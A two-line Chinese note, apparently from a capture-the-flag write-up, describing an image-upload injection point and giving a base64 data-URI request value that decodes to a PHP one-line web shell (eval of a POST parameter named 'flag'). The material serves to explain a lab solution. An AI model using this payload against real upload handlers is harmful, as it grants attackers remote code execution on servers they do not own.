注入点在上传图片处,图片上传后会被base64编码,就从这里入手,上传一句话木马;
image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1BPU1RbJ2ZsYWcnXSk7Pz4=